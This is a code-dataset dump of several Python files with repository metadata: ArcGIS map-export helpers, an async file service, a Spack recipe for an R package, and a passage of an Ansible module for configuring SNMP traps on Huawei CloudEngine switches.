22c5ffc18357605c1164abb92cfa365a095206d5 | 4,788 | py | Python | CarParkArcGisApi/CarParkArcGisApi/env/Lib/site-packages/arcgis/mapping/_utils.py | moazzamwaheed2017/carparkapi | e52ae1b2aed47321ce9d22ba6cd0b85fa60a417a | [
"MIT"
] | null | null | null | CarParkArcGisApi/CarParkArcGisApi/env/Lib/site-packages/arcgis/mapping/_utils.py | moazzamwaheed2017/carparkapi | e52ae1b2aed47321ce9d22ba6cd0b85fa60a417a | [
"MIT"
] | 9 | 2020-02-03T15:50:10.000Z | 2022-03-02T07:11:34.000Z | CarParkArcGisApi/CarParkArcGisApi/env/Lib/site-packages/arcgis/mapping/_utils.py | moazzamwaheed2017/carparkapi | e52ae1b2aed47321ce9d22ba6cd0b85fa60a417a | [
"MIT"
] | null | null | null | import logging as _logging
import arcgis
_log = _logging.getLogger(__name__)
_use_async = False
def _get_list_value(index, array):
"""
helper operation to loop a list of values regardless of the index value
Example:
>>> a = [111,222,333]
>>> list_loop(15, a)
111
"""
if len(array) == 0:
return None
elif index >= 0 and index < len(array):
return array[index]
return array[index % len(array)]
def export_map(web_map_as_json = None,
               format = """PDF""",
               layout_template = """MAP_ONLY""",
               gis=None):
    """
    This function takes the state of the web map(for example, included services, layer visibility
    settings, client-side graphics, and so forth) and returns either (a) a page layout or
    (b) a map without page surrounds of the specified area of interest in raster or vector format.
    The input for this function is a piece of text in JavaScript object notation (JSON) format describing the layers,
    graphics, and other settings in the web map. The JSON must be structured according to the WebMap specification
    in the ArcGIS HelpThis tool is shipped with ArcGIS Server to support web services for printing, including the
    preconfigured service named PrintingTools.
    Parameters:
       web_map_as_json: Web Map as JSON (str). Required parameter.  A JSON representation of the state of the map to be exported as it appears in the web application. See the WebMap specification in the ArcGIS Help to understand how this text should be formatted. The ArcGIS web APIs (for JavaScript, Flex, Silverlight, etc.) allow developers to easily get this JSON string from the map.
       format: Format (str). Optional parameter.  The format in which the map image for printing will be delivered. The following strings are accepted.For example:PNG8 (default if the parameter is left blank)PDFPNG32JPGGIFEPSSVGSVGZ
          Choice list:['PDF', 'PNG32', 'PNG8', 'JPG', 'GIF', 'EPS', 'SVG', 'SVGZ']
       layout_template: Layout Template (str). Optional parameter.  Either a name of a template from the list or the keyword MAP_ONLY. When MAP_ONLY is chosen or an empty string is passed in, the output map does not contain any page layout surroundings (for example title, legends, scale bar, and so forth)
          Choice list:['A3 Landscape', 'A3 Portrait', 'A4 Landscape', 'A4 Portrait', 'Letter ANSI A Landscape', 'Letter ANSI A Portrait', 'Tabloid ANSI B Landscape', 'Tabloid ANSI B Portrait', 'MAP_ONLY']
       gis: Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
    Returns:
       output_file - Output File as a DataFile
    See https://utility.arcgisonline.com/arcgis/rest/directories/arcgisoutput/Utilities/PrintingTools_GPServer/Utilities_PrintingTools/ExportWebMapTask.htm for additional help.
    """
    # imports deferred to call time to avoid a circular import at module load
    from arcgis.geoprocessing import DataFile
    from arcgis.geoprocessing._support import _execute_gp_tool
    # snapshot of the call arguments; NOTE(review): taken AFTER the imports
    # above, so it also contains 'DataFile' and '_execute_gp_tool' —
    # presumably _execute_gp_tool only reads the keys listed in param_db; verify.
    kwargs = locals()

    # maps python parameter names -> (type, GP service parameter name)
    param_db = {
        "web_map_as_json": (str, "Web_Map_as_JSON"),
        "format": (str, "Format"),
        "layout_template": (str, "Layout_Template"),
        "output_file": (DataFile, "Output File"),
    }
    return_values = [
        {"name": "output_file", "display_name": "Output File", "type": DataFile},
    ]

    if gis is None:
        gis = arcgis.env.active_gis
    # strip the URL-encoded task suffix to get the printing service root URL
    url = gis.properties.helperServices.printTask.url[:-len('/Export%20Web%20Map%20Task')]
    return _execute_gp_tool(gis, "Export Web Map Task", kwargs, param_db, return_values, _use_async, url)

# annotations assigned post-hoc (keeps the def line free of annotation syntax)
export_map.__annotations__ = {
    'web_map_as_json': str,
    'format': str,
    'layout_template': str
}
def get_layout_templates(gis=None):
    """
    This function returns the content of the GIS's layout templates formatted as dict.
    Parameters:
       gis: Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
    Returns:
       output_json - layout templates as Python dict
    See https://utility.arcgisonline.com/arcgis/rest/directories/arcgisoutput/Utilities/PrintingTools_GPServer/Utilities_PrintingTools/GetLayoutTemplatesInfo.htm for additional help.
    """
    # NOTE(review): DataFile appears unused in this function; import kept for
    # parity with export_map — confirm before removing.
    from arcgis.geoprocessing import DataFile
    from arcgis.geoprocessing._support import _execute_gp_tool
    # snapshot of the call arguments; taken after the imports above so it
    # also contains the imported names — _execute_gp_tool presumably filters
    # by the keys in param_db; verify.
    kwargs = locals()

    param_db = {
        "output_json": (str, "Output JSON"),
    }
    return_values = [
        {"name": "output_json", "display_name": "Output JSON", "type": str},
    ]

    if gis is None:
        gis = arcgis.env.active_gis
    # strip the URL-encoded task suffix to get the printing service root URL
    url = gis.properties.helperServices.printTask.url[:-len('/Export%20Web%20Map%20Task')]
    return _execute_gp_tool(gis, "Get Layout Templates Info Task", kwargs, param_db, return_values, _use_async, url)
get_layout_templates.__annotations__ = {'return': str} | 38.926829 | 383 | 0.7099 | import logging as _logging
import arcgis
_log = _logging.getLogger(__name__)
_use_async = False
def _get_list_value(index, array):
"""
helper operation to loop a list of values regardless of the index value
Example:
>>> a = [111,222,333]
>>> list_loop(15, a)
111
"""
if len(array) == 0:
return None
elif index >= 0 and index < len(array):
return array[index]
return array[index % len(array)]
def export_map(web_map_as_json = None,
format = """PDF""",
layout_template = """MAP_ONLY""",
gis=None):
"""
This function takes the state of the web map(for example, included services, layer visibility
settings, client-side graphics, and so forth) and returns either (a) a page layout or
(b) a map without page surrounds of the specified area of interest in raster or vector format.
The input for this function is a piece of text in JavaScript object notation (JSON) format describing the layers,
graphics, and other settings in the web map. The JSON must be structured according to the WebMap specification
in the ArcGIS HelpThis tool is shipped with ArcGIS Server to support web services for printing, including the
preconfigured service named PrintingTools.
Parameters:
web_map_as_json: Web Map as JSON (str). Required parameter. A JSON representation of the state of the map to be exported as it appears in the web application. See the WebMap specification in the ArcGIS Help to understand how this text should be formatted. The ArcGIS web APIs (for JavaScript, Flex, Silverlight, etc.) allow developers to easily get this JSON string from the map.
format: Format (str). Optional parameter. The format in which the map image for printing will be delivered. The following strings are accepted.For example:PNG8 (default if the parameter is left blank)PDFPNG32JPGGIFEPSSVGSVGZ
Choice list:['PDF', 'PNG32', 'PNG8', 'JPG', 'GIF', 'EPS', 'SVG', 'SVGZ']
layout_template: Layout Template (str). Optional parameter. Either a name of a template from the list or the keyword MAP_ONLY. When MAP_ONLY is chosen or an empty string is passed in, the output map does not contain any page layout surroundings (for example title, legends, scale bar, and so forth)
Choice list:['A3 Landscape', 'A3 Portrait', 'A4 Landscape', 'A4 Portrait', 'Letter ANSI A Landscape', 'Letter ANSI A Portrait', 'Tabloid ANSI B Landscape', 'Tabloid ANSI B Portrait', 'MAP_ONLY']
gis: Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
Returns:
output_file - Output File as a DataFile
See https://utility.arcgisonline.com/arcgis/rest/directories/arcgisoutput/Utilities/PrintingTools_GPServer/Utilities_PrintingTools/ExportWebMapTask.htm for additional help.
"""
from arcgis.geoprocessing import DataFile
from arcgis.geoprocessing._support import _execute_gp_tool
kwargs = locals()
param_db = {
"web_map_as_json": (str, "Web_Map_as_JSON"),
"format": (str, "Format"),
"layout_template": (str, "Layout_Template"),
"output_file": (DataFile, "Output File"),
}
return_values = [
{"name": "output_file", "display_name": "Output File", "type": DataFile},
]
if gis is None:
gis = arcgis.env.active_gis
url = gis.properties.helperServices.printTask.url[:-len('/Export%20Web%20Map%20Task')]
return _execute_gp_tool(gis, "Export Web Map Task", kwargs, param_db, return_values, _use_async, url)
export_map.__annotations__ = {
'web_map_as_json': str,
'format': str,
'layout_template': str
}
def get_layout_templates(gis=None):
"""
This function returns the content of the GIS's layout templates formatted as dict.
Parameters:
gis: Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
Returns:
output_json - layout templates as Python dict
See https://utility.arcgisonline.com/arcgis/rest/directories/arcgisoutput/Utilities/PrintingTools_GPServer/Utilities_PrintingTools/GetLayoutTemplatesInfo.htm for additional help.
"""
from arcgis.geoprocessing import DataFile
from arcgis.geoprocessing._support import _execute_gp_tool
kwargs = locals()
param_db = {
"output_json": (str, "Output JSON"),
}
return_values = [
{"name": "output_json", "display_name": "Output JSON", "type": str},
]
if gis is None:
gis = arcgis.env.active_gis
url = gis.properties.helperServices.printTask.url[:-len('/Export%20Web%20Map%20Task')]
return _execute_gp_tool(gis, "Get Layout Templates Info Task", kwargs, param_db, return_values, _use_async, url)
get_layout_templates.__annotations__ = {'return': str} | 0 | 0 | 0 |
4da290692a1a584cea7cacaa0f0a14b29df47e75 | 1,002 | py | Python | scenario3-clustering/docker/clustering/fileService.py | vietzd/qc-cloud-challenges | b239840b9924393f5c5e5939cea291b80e8198c5 | [
"Apache-2.0"
] | 3 | 2020-10-16T07:46:17.000Z | 2021-07-27T12:17:55.000Z | qhana/microservices/clustering/fileService.py | UST-QuAntiL/qhana | bf499d072dcc37f81efec1b8e17b7d5460db7a04 | [
"Apache-2.0"
] | null | null | null | qhana/microservices/clustering/fileService.py | UST-QuAntiL/qhana | bf499d072dcc37f81efec1b8e17b7d5460db7a04 | [
"Apache-2.0"
] | null | null | null | """
Author: Daniel Fink
Email: daniel-fink@outlook.com
"""
import os
import aiohttp
class FileService:
"""
A service class for all kind of file access like downloads,
file deletion, folder deletion, ...
"""
@classmethod
@classmethod
@classmethod
@classmethod | 27.081081 | 72 | 0.653693 | """
Author: Daniel Fink
Email: daniel-fink@outlook.com
"""
import os
import aiohttp
class FileService:
    """
    A service class for all kind of file access like downloads,
    file deletion, folder deletion, ...
    """

    @classmethod
    def delete_if_exist(cls, *file_paths):
        """Delete each given file path that exists; missing paths are skipped."""
        for file_path in file_paths:
            if os.path.exists(file_path):
                os.remove(file_path)

    @classmethod
    def create_folder_if_not_exist(cls, folder_path):
        """Create the folder (and any missing parents); no-op if it exists."""
        os.makedirs(folder_path, exist_ok=True)

    @classmethod
    async def fetch_data_as_text(cls, session, url):
        """GET *url* with the given aiohttp session and return the body as text."""
        async with session.get(url) as response:
            return await response.text()

    @classmethod
    async def download_to_file(cls, url, file_path):
        """Download *url* and write its text content to *file_path*."""
        async with aiohttp.ClientSession() as session:
            content_as_text = await cls.fetch_data_as_text(session, url)
            # context manager guarantees the handle is closed even if the
            # write raises (original leaked the handle on error)
            with open(file_path, 'w') as text_file:
                text_file.write(content_as_text)
675143110b25e3987bef5bdf13fdd698811b50f5 | 1,251 | py | Python | var/spack/repos/builtin/packages/r-exactextractr/package.py | varioustoxins/spack | cab0e4cb240f34891a6d753f3393e512f9a99e9a | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/r-exactextractr/package.py | varioustoxins/spack | cab0e4cb240f34891a6d753f3393e512f9a99e9a | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 6 | 2022-01-08T08:41:11.000Z | 2022-03-14T19:28:07.000Z | var/spack/repos/builtin/packages/r-exactextractr/package.py | foeroyingur/spack | 5300cbbb2e569190015c72d0970d25425ea38647 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RExactextractr(RPackage):
    """Fast Extraction from Raster Datasets using Polygons

    Provides a replacement for the 'extract' function from the 'raster' package
    that is suitable for extracting raster values using 'sf' polygons."""

    homepage = "https://cloud.r-project.org/package=exactextractr"
    url      = "https://cloud.r-project.org/src/contrib/exactextractr_0.3.0.tar.gz"
    list_url = "https://cloud.r-project.org/src/contrib/Archive/exactextractr"

    # sha256 checksums pin the exact upstream tarball contents
    version('0.5.1', sha256='47ddfb4b9e42e86957e03b1c745d657978d7c4bed12ed3aa053e1bc89f20616d')
    version('0.3.0', sha256='c7fb38b38b9dc8b3ca5b8f1f84f4ba3256efd331f2b4636b496d42689ffc3fb0')
    version('0.2.1', sha256='d0b998c77c3fd9265a600a0e08e9bf32a2490a06c19df0d0c0dea4b5c9ab5773')

    # R runtime and R-package dependencies
    depends_on('r@3.4.0:', type=('build', 'run'))
    depends_on('r-rcpp@0.12.12:', type=('build', 'run'))
    depends_on('r-raster', type=('build', 'run'))
    depends_on('r-sf', type=('build', 'run'))
    # native GEOS library is also linked against, not just used at run time
    depends_on('geos@3.5.0:', type=('build', 'run', 'link'))
| 44.678571 | 95 | 0.723421 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RExactextractr(RPackage):
"""Fast Extraction from Raster Datasets using Polygons
Provides a replacement for the 'extract' function from the 'raster' package
that is suitable for extracting raster values using 'sf' polygons."""
homepage = "https://cloud.r-project.org/package=exactextractr"
url = "https://cloud.r-project.org/src/contrib/exactextractr_0.3.0.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/exactextractr"
version('0.5.1', sha256='47ddfb4b9e42e86957e03b1c745d657978d7c4bed12ed3aa053e1bc89f20616d')
version('0.3.0', sha256='c7fb38b38b9dc8b3ca5b8f1f84f4ba3256efd331f2b4636b496d42689ffc3fb0')
version('0.2.1', sha256='d0b998c77c3fd9265a600a0e08e9bf32a2490a06c19df0d0c0dea4b5c9ab5773')
depends_on('r@3.4.0:', type=('build', 'run'))
depends_on('r-rcpp@0.12.12:', type=('build', 'run'))
depends_on('r-raster', type=('build', 'run'))
depends_on('r-sf', type=('build', 'run'))
depends_on('geos@3.5.0:', type=('build', 'run', 'link'))
| 0 | 0 | 0 |
101787d79ae009404ae396cdca46beb13ebed6be | 19,566 | py | Python | myprojectenv/lib/python3.5/site-packages/ansible/modules/network/cloudengine/ce_snmp_traps.py | lancerenteria/doFlask | 2d4e242469b108c6c8316ee18a540307497bfb53 | [
"MIT"
] | null | null | null | myprojectenv/lib/python3.5/site-packages/ansible/modules/network/cloudengine/ce_snmp_traps.py | lancerenteria/doFlask | 2d4e242469b108c6c8316ee18a540307497bfb53 | [
"MIT"
] | null | null | null | myprojectenv/lib/python3.5/site-packages/ansible/modules/network/cloudengine/ce_snmp_traps.py | lancerenteria/doFlask | 2d4e242469b108c6c8316ee18a540307497bfb53 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_snmp_traps
version_added: "2.4"
short_description: Manages SNMP traps configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP traps configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
feature_name:
description:
- Alarm feature name.
required: false
default: null
choices: ['aaa', 'arp', 'bfd', 'bgp', 'cfg', 'configuration', 'dad', 'devm',
'dhcpsnp', 'dldp', 'driver', 'efm', 'erps', 'error-down', 'fcoe',
'fei', 'fei_comm', 'fm', 'ifnet', 'info', 'ipsg', 'ipv6', 'isis',
'l3vpn', 'lacp', 'lcs', 'ldm', 'ldp', 'ldt', 'lldp', 'mpls_lspm',
'msdp', 'mstp', 'nd', 'netconf', 'nqa', 'nvo3', 'openflow', 'ospf',
'ospfv3', 'pim', 'pim-std', 'qos', 'radius', 'rm', 'rmon', 'securitytrap',
'smlktrap', 'snmp', 'ssh', 'stackmng', 'sysclock', 'sysom', 'system',
'tcp', 'telnet', 'trill', 'trunk', 'tty', 'vbst', 'vfs', 'virtual-perception',
'vrrp', 'vstm', 'all']
trap_name:
description:
- Alarm trap name.
required: false
default: null
interface_type:
description:
- Interface type.
required: false
default: null
choices: ['Ethernet', 'Eth-Trunk', 'Tunnel', 'NULL', 'LoopBack', 'Vlanif', '100GE',
'40GE', 'MTunnel', '10GE', 'GE', 'MEth', 'Vbdif', 'Nve']
interface_number:
description:
- Interface number.
required: false
default: null
port_number:
description:
- Source port number.
required: false
default: null
'''
EXAMPLES = '''
- name: CloudEngine snmp traps test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP trap all enable"
ce_snmp_traps:
state: present
feature_name: all
provider: "{{ cli }}"
- name: "Config SNMP trap interface"
ce_snmp_traps:
state: present
interface_type: 40GE
interface_number: 2/0/1
provider: "{{ cli }}"
- name: "Config SNMP trap port"
ce_snmp_traps:
state: present
port_number: 2222
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"feature_name": "all",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {"snmp-agent trap": [],
"undo snmp-agent trap": []}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"snmp-agent trap": ["enable"],
"undo snmp-agent trap": []}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent trap enable"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec, run_commands
class SnmpTraps(object):
    """ Manages SNMP trap configuration

    Reads the current trap-related lines from the device CLI config,
    compares them with the requested state, and issues the minimal set of
    'snmp-agent trap ...' / 'undo snmp-agent trap ...' commands.
    """

    def __init__(self, **kwargs):
        """ Class init """

        # module
        argument_spec = kwargs["argument_spec"]
        self.spec = argument_spec
        self.module = AnsibleModule(
            argument_spec=self.spec,
            required_together=[("interface_type", "interface_number")],
            supports_check_mode=True
        )

        # config: current device trap config, parsed into two buckets
        self.cur_cfg = dict()
        self.cur_cfg["snmp-agent trap"] = []
        self.cur_cfg["undo snmp-agent trap"] = []

        # module args
        self.state = self.module.params['state']
        self.feature_name = self.module.params['feature_name']
        self.trap_name = self.module.params['trap_name']
        self.interface_type = self.module.params['interface_type']
        self.interface_number = self.module.params['interface_number']
        self.port_number = self.module.params['port_number']

        # state: result bookkeeping for exit_json
        self.changed = False
        self.updates_cmd = list()
        self.results = dict()
        self.proposed = dict()
        self.existing = dict()
        self.existing["snmp-agent trap"] = []
        self.existing["undo snmp-agent trap"] = []
        self.end_state = dict()
        self.end_state["snmp-agent trap"] = []
        self.end_state["undo snmp-agent trap"] = []

        # cache 'display interface brief' output once; used by check_args
        # to validate that a requested source interface exists on the device
        commands = list()
        cmd1 = 'display interface brief'
        commands.append(cmd1)
        self.interface = run_commands(self.module, commands)

    def check_args(self):
        """ Check invalid args

        Fails the module if port_number is non-numeric or outside the
        non-well-known range, or if the requested source interface is not
        present in the cached 'display interface brief' output.
        """

        if self.port_number:
            if self.port_number.isdigit():
                # only ports above the well-known range are accepted
                if int(self.port_number) < 1025 or int(self.port_number) > 65535:
                    self.module.fail_json(
                        msg='Error: The value of port_number is out of [1025 - 65535].')
            else:
                self.module.fail_json(
                    msg='Error: The port_number is not digit.')

        if self.interface_type and self.interface_number:
            tmp_interface = self.interface_type + self.interface_number
            # self.interface[0] is the text output of 'display interface brief'
            if tmp_interface not in self.interface[0]:
                self.module.fail_json(
                    msg='Error: The interface %s is not in the device.' % tmp_interface)

    def get_proposed(self):
        """ Get proposed state: echo the non-empty module args back """

        self.proposed["state"] = self.state

        if self.feature_name:
            self.proposed["feature_name"] = self.feature_name

        if self.trap_name:
            self.proposed["trap_name"] = self.trap_name

        if self.interface_type:
            self.proposed["interface_type"] = self.interface_type

        if self.interface_number:
            self.proposed["interface_number"] = self.interface_number

        if self.port_number:
            self.proposed["port_number"] = self.port_number

    def get_existing(self):
        """ Get existing state by parsing the trap lines of the running config

        Fills both self.cur_cfg (used by work()) and self.existing (reported).
        """

        tmp_cfg = self.cli_get_config()
        if tmp_cfg:
            # source/source-port lines are matched case-sensitively,
            # feature lines case-insensitively (hence the lowered copy)
            temp_cfg_lower = tmp_cfg.lower()
            temp_data = tmp_cfg.split("\n")
            temp_data_lower = temp_cfg_lower.split("\n")

            for item in temp_data:
                if "snmp-agent trap source-port " in item:
                    if self.port_number:
                        # split() keeps the text after the keyword (the port)
                        item_tmp = item.split("snmp-agent trap source-port ")
                        self.cur_cfg["trap source-port"] = item_tmp[1]
                        self.existing["trap source-port"] = item_tmp[1]

                elif "snmp-agent trap source " in item:
                    if self.interface_type:
                        item_tmp = item.split("snmp-agent trap source ")
                        self.cur_cfg["trap source interface"] = item_tmp[1]
                        self.existing["trap source interface"] = item_tmp[1]

            if self.feature_name:
                for item in temp_data_lower:
                    if item == "snmp-agent trap enable":
                        self.cur_cfg["snmp-agent trap"].append("enable")
                        self.existing["snmp-agent trap"].append("enable")
                    elif item == "snmp-agent trap disable":
                        self.cur_cfg["snmp-agent trap"].append("disable")
                        self.existing["snmp-agent trap"].append("disable")
                    elif "undo snmp-agent trap enable " in item:
                        # explicitly disabled feature/trap names
                        item_tmp = item.split("undo snmp-agent trap enable ")
                        self.cur_cfg[
                            "undo snmp-agent trap"].append(item_tmp[1])
                        self.existing[
                            "undo snmp-agent trap"].append(item_tmp[1])
                    elif "snmp-agent trap enable " in item:
                        # explicitly enabled feature/trap names
                        item_tmp = item.split("snmp-agent trap enable ")
                        self.cur_cfg["snmp-agent trap"].append(item_tmp[1])
                        self.existing["snmp-agent trap"].append(item_tmp[1])
            else:
                # feature_name not requested: drop the (empty) trap buckets
                # from the reported existing state
                del self.existing["snmp-agent trap"]
                del self.existing["undo snmp-agent trap"]

    def get_end_state(self):
        """ Get end_state state: same parsing as get_existing, after changes """

        tmp_cfg = self.cli_get_config()
        if tmp_cfg:
            temp_cfg_lower = tmp_cfg.lower()
            temp_data = tmp_cfg.split("\n")
            temp_data_lower = temp_cfg_lower.split("\n")

            for item in temp_data:
                if "snmp-agent trap source-port " in item:
                    if self.port_number:
                        item_tmp = item.split("snmp-agent trap source-port ")
                        self.end_state["trap source-port"] = item_tmp[1]

                elif "snmp-agent trap source " in item:
                    if self.interface_type:
                        item_tmp = item.split("snmp-agent trap source ")
                        self.end_state["trap source interface"] = item_tmp[1]

            if self.feature_name:
                for item in temp_data_lower:
                    if item == "snmp-agent trap enable":
                        self.end_state["snmp-agent trap"].append("enable")
                    elif item == "snmp-agent trap disable":
                        self.end_state["snmp-agent trap"].append("disable")
                    elif "undo snmp-agent trap enable " in item:
                        item_tmp = item.split("undo snmp-agent trap enable ")
                        self.end_state[
                            "undo snmp-agent trap"].append(item_tmp[1])
                    elif "snmp-agent trap enable " in item:
                        item_tmp = item.split("snmp-agent trap enable ")
                        self.end_state["snmp-agent trap"].append(item_tmp[1])
            else:
                del self.end_state["snmp-agent trap"]
                del self.end_state["undo snmp-agent trap"]

    def cli_load_config(self, commands):
        """ Load configure through cli (skipped in check mode) """

        if not self.module.check_mode:
            load_config(self.module, commands)

    def cli_get_config(self):
        """ Get configure through cli, filtered to snmp trap lines """

        regular = "| include snmp | include trap"
        flags = list()
        flags.append(regular)
        tmp_cfg = get_config(self.module, flags)

        return tmp_cfg

    def set_trap_feature_name(self):
        """ Set feature name for trap (enable globally when feature is 'all') """

        if self.feature_name == "all":
            cmd = "snmp-agent trap enable"
        else:
            cmd = "snmp-agent trap enable feature-name %s" % self.feature_name
            if self.trap_name:
                cmd += " trap-name %s" % self.trap_name

        self.updates_cmd.append(cmd)

        cmds = list()
        cmds.append(cmd)

        self.cli_load_config(cmds)
        self.changed = True

    def undo_trap_feature_name(self):
        """ Undo feature name for trap (disable globally when feature is 'all') """

        if self.feature_name == "all":
            cmd = "undo snmp-agent trap enable"
        else:
            cmd = "undo snmp-agent trap enable feature-name %s" % self.feature_name
            if self.trap_name:
                cmd += " trap-name %s" % self.trap_name

        self.updates_cmd.append(cmd)

        cmds = list()
        cmds.append(cmd)

        self.cli_load_config(cmds)
        self.changed = True

    def set_trap_source_interface(self):
        """ Set source interface for trap """

        cmd = "snmp-agent trap source %s %s" % (
            self.interface_type, self.interface_number)
        self.updates_cmd.append(cmd)

        cmds = list()
        cmds.append(cmd)

        self.cli_load_config(cmds)
        self.changed = True

    def undo_trap_source_interface(self):
        """ Undo source interface for trap """

        cmd = "undo snmp-agent trap source"
        self.updates_cmd.append(cmd)

        cmds = list()
        cmds.append(cmd)

        self.cli_load_config(cmds)
        self.changed = True

    def set_trap_source_port(self):
        """ Set source port for trap """

        cmd = "snmp-agent trap source-port %s" % self.port_number
        self.updates_cmd.append(cmd)

        cmds = list()
        cmds.append(cmd)

        self.cli_load_config(cmds)
        self.changed = True

    def undo_trap_source_port(self):
        """ Undo source port for trap """

        cmd = "undo snmp-agent trap source-port"
        self.updates_cmd.append(cmd)

        cmds = list()
        cmds.append(cmd)

        self.cli_load_config(cmds)
        self.changed = True

    def work(self):
        """ The work function

        Diffs requested state against cur_cfg and issues only the commands
        needed, then reports proposed/existing/end_state/updates.
        """

        self.check_args()
        self.get_proposed()
        self.get_existing()

        find_flag = False
        find_undo_flag = False
        tmp_interface = None

        if self.state == "present":
            if self.feature_name:
                # tmp_cfg mirrors the lowered config-line suffix parsed
                # in get_existing, so string comparison works
                if self.trap_name:
                    tmp_cfg = "feature-name %s trap-name %s" % (
                        self.feature_name, self.trap_name.lower())
                else:
                    tmp_cfg = "feature-name %s" % self.feature_name

                # if the feature/trap is currently 'undo'-disabled (or any
                # undo exists while enabling 'all'), re-enable it
                find_undo_flag = False
                if self.cur_cfg["undo snmp-agent trap"]:
                    for item in self.cur_cfg["undo snmp-agent trap"]:
                        if item == tmp_cfg:
                            find_undo_flag = True
                        elif tmp_cfg in item:
                            find_undo_flag = True
                        elif self.feature_name == "all":
                            find_undo_flag = True
                if find_undo_flag:
                    self.set_trap_feature_name()

                # otherwise enable only if not already enabled
                # (globally or for this feature)
                if not find_undo_flag:
                    find_flag = False
                    if self.cur_cfg["snmp-agent trap"]:
                        for item in self.cur_cfg["snmp-agent trap"]:
                            if item == "enable":
                                find_flag = True
                            elif item == tmp_cfg:
                                find_flag = True
                    if not find_flag:
                        self.set_trap_feature_name()

            if self.interface_type:
                # set source interface unless it already matches
                find_flag = False
                tmp_interface = self.interface_type + self.interface_number

                if "trap source interface" in self.cur_cfg.keys():
                    if self.cur_cfg["trap source interface"] == tmp_interface:
                        find_flag = True

                if not find_flag:
                    self.set_trap_source_interface()

            if self.port_number:
                # set source port unless it already matches
                find_flag = False

                if "trap source-port" in self.cur_cfg.keys():
                    if self.cur_cfg["trap source-port"] == self.port_number:
                        find_flag = True

                if not find_flag:
                    self.set_trap_source_port()

        else:
            # state == 'absent': remove the requested pieces of trap config
            if self.feature_name:
                if self.trap_name:
                    tmp_cfg = "feature-name %s trap-name %s" % (
                        self.feature_name, self.trap_name.lower())
                else:
                    tmp_cfg = "feature-name %s" % self.feature_name

                # is the feature/trap currently enabled (explicitly, globally,
                # or implicitly because no trap lines exist at all)?
                find_flag = False
                if self.cur_cfg["snmp-agent trap"]:
                    for item in self.cur_cfg["snmp-agent trap"]:
                        if item == tmp_cfg:
                            find_flag = True
                        elif item == "enable":
                            find_flag = True
                        elif tmp_cfg in item:
                            find_flag = True
                else:
                    find_flag = True

                # already 'undo'-disabled?
                find_undo_flag = False
                if self.cur_cfg["undo snmp-agent trap"]:
                    for item in self.cur_cfg["undo snmp-agent trap"]:
                        if item == tmp_cfg:
                            find_undo_flag = True
                        elif tmp_cfg in item:
                            find_undo_flag = True

                if find_undo_flag:
                    # nothing to do: already disabled
                    pass
                elif find_flag:
                    self.undo_trap_feature_name()

            if self.interface_type:
                # remove source interface only if one is configured
                if "trap source interface" in self.cur_cfg.keys():
                    self.undo_trap_source_interface()

            if self.port_number:
                # remove source port only if one is configured
                if "trap source-port" in self.cur_cfg.keys():
                    self.undo_trap_source_port()

        self.get_end_state()

        self.results['changed'] = self.changed
        self.results['proposed'] = self.proposed
        self.results['existing'] = self.existing
        self.results['end_state'] = self.end_state
        self.results['updates'] = self.updates_cmd

        self.module.exit_json(**self.results)
def main():
    """Entry point: build the argument spec and run the SNMP-trap module."""

    # alarm features the device supports ('all' toggles traps globally)
    feature_names = ['aaa', 'arp', 'bfd', 'bgp', 'cfg', 'configuration', 'dad',
                     'devm', 'dhcpsnp', 'dldp', 'driver', 'efm', 'erps', 'error-down',
                     'fcoe', 'fei', 'fei_comm', 'fm', 'ifnet', 'info', 'ipsg', 'ipv6',
                     'isis', 'l3vpn', 'lacp', 'lcs', 'ldm', 'ldp', 'ldt', 'lldp',
                     'mpls_lspm', 'msdp', 'mstp', 'nd', 'netconf', 'nqa', 'nvo3',
                     'openflow', 'ospf', 'ospfv3', 'pim', 'pim-std', 'qos', 'radius',
                     'rm', 'rmon', 'securitytrap', 'smlktrap', 'snmp', 'ssh', 'stackmng',
                     'sysclock', 'sysom', 'system', 'tcp', 'telnet', 'trill', 'trunk',
                     'tty', 'vbst', 'vfs', 'virtual-perception', 'vrrp', 'vstm', 'all']
    # interface types accepted as a trap source
